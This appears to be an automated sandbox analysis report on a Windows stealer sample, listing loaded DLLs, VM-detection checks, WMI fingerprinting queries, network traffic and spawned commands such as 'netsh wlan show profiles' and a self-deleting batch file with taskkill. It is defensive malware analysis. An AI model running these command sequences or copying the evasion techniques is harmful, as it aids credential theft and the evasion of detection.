          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: bPkG0wTVon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: bPkG0wTVon.exeStatic file information: File size 3084288 > 1048576
          Source: bPkG0wTVon.exeStatic PE information: Raw size of .\C3 is bigger than: 0x100000 < 0x184800
          Source: bPkG0wTVon.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: bPkG0wTVon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: System.Xml.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: C:\Users\Malware\source\repos\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: bPkG0wTVon.exe
          Source: Binary string: C:\Users\Raifon\source\repos\Arcana\Arcana\bin\Release\Arcana.pdb source: bPkG0wTVon.exe
          Source: Binary string: System.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata source: bPkG0wTVon.exe, 00000000.00000002.1506746297.00000000076C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdb source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.pdbt source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.ni.pdb source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Security.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Xml.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Windows.Forms.pdb source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*ata source: bPkG0wTVon.exe, 00000000.00000002.1506746297.00000000076C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.pdb source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: Arcana.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.pdbH source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.ni.pdbRSDS] source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.pdbp source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: C:\Users\Malware\source\repos\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb" source: bPkG0wTVon.exe
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Web.pdb source: WERB95F.tmp.dmp.24.dr
          Source: bPkG0wTVon.exe Static PE information: section name: .\C3
          Source: bPkG0wTVon.exe Static PE information: section name: ."@W
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Code function: 0_2_04D524FB push eax; mov dword ptr [esp], ecx 0_2_04D524FC
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Code function: 0_2_05DF9955 push esp; ret 0_2_05DF9A79
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Code function: 0_2_08314B88 push esp; ret 0_2_08314B89
          Source: bPkG0wTVon.exe Static PE information: section name: .text entropy: 7.540602371038387
          Source: bPkG0wTVon.exe Static PE information: section name: .\C3 entropy: 7.349314887296056

          Hooking and other Techniques for Hiding and Protection

          Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 1490
          Source: unknown Network traffic detected: HTTP traffic on port 1490 -> 49718
          Source: unknown Network traffic detected: HTTP traffic on port 1490 -> 49718
          Source: unknown Network traffic detected: HTTP traffic on port 1490 -> 49718
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_CacheMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from CIM_Memory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Memory allocated: 26A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Memory allocated: 2830000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Memory allocated: 4830000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Window / User API: threadDelayed 9949
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, Product FROM Win32_BaseBoard
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe File Volume queried: C:\ FullSizeInformation
          Source: bPkG0wTVon.exe Binary or memory string: IsRunningInVirtualMachine1
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qemu-ga
          Source: bPkG0wTVon.exe Binary or memory string: IsRunningInVirtualMachine2
          Source: bPkG0wTVon.exe Binary or memory string: IsVirtualMachine
          Source: Amcache.hve.24.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: bPkG0wTVon.exe Binary or memory string: qemu-ga#SPICE Guest Tools
          Source: bPkG0wTVon.exe, 00000000.00000002.1493209045.0000000000B01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: bPkG0wTVon.exe, Killer.cs Reference to suspicious API methods: OpenProcess(1u, (byte)bInheritHandle != 0, processId)
          Source: bPkG0wTVon.exe, ImportHider.cs Reference to suspicious API methods: LoadLibrary(dllName)
          Source: bPkG0wTVon.exe, ImportHider.cs Reference to suspicious API methods: GetProcAddress(intPtr, methodName)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 8592
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 8592
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Queries volume information: C:\Users\user\Desktop\bPkG0wTVon.exe VolumeInformation
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

